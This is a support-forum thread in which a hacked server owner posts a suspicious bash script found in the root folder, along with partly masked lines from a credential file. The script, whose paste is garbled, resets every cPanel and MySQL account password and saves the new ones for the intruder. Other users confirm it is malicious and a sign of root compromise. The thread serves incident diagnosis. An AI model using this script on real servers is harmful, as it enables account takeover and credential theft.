Suspicious file in my root folder

abursill

• November 08, 2019 21:34

I was hacked a few days ago and I recently found the following scippt in my root folder called sss.sh #!/bin/bash #Changes every cPanel password on the server and stores the credentials in ~/newCredentials #$newPassword is a randomly generated password with 10 characters export ALLOW_PASSWORD_CHANGE=1 ls -la /home | awk '{print $3}' | grep -v root | grep -v wheel | grep -v cpanel | grep -v apache | grep -v csf | grep -v '^$' > /tmp/usersforchpass for i in `more /tmp/usersforchpass ` do newPassword='Ahley@'$(> ~/cpanel.txt echo "" >> ~/newCredentials /scripts/chpass $i $newPassword /scripts/mysqlpasswd $i $newPassword done
Can anyone confirm if this is a valid cpanel script? There is also a text file called cpanel.txt Host/IP|africaexxxxx|Ahley@oOMrNx#74 Host/IP|buyanxxxxx|Ahley@MaxNGa#74 Host/IP|celebrixxxx|Ahley@OLVWMg#74
The xxxx is the rest of a domains hostname. There is also the file mentioned newCredentials there seems blank when I open it in a text edtor but has no extension but is not a text file. Maybe I am worrying about nothing but these files have me worried since I had to delete 50% of my domains for phishing scripts in the last few days.

• 

  GOT

  • November 11, 2019 13:37

  It is not a cPanel script. This when ran would change all the account passwords and let the person who ran it get a list of them. If this was in /root then you defiintely have a very high level intrusion.

  0
• 

  cPanelLauren

  • November 11, 2019 16:03

  This is indeed not a valid cPanel script. As @GOT suggested if this was in /root or anywhere that was not a user-level directory a root compromise could be a factor. If you'd like to find out for sure you're welcome to open a ticket and our analysts can investigate.

  0

Please sign in to leave a comment.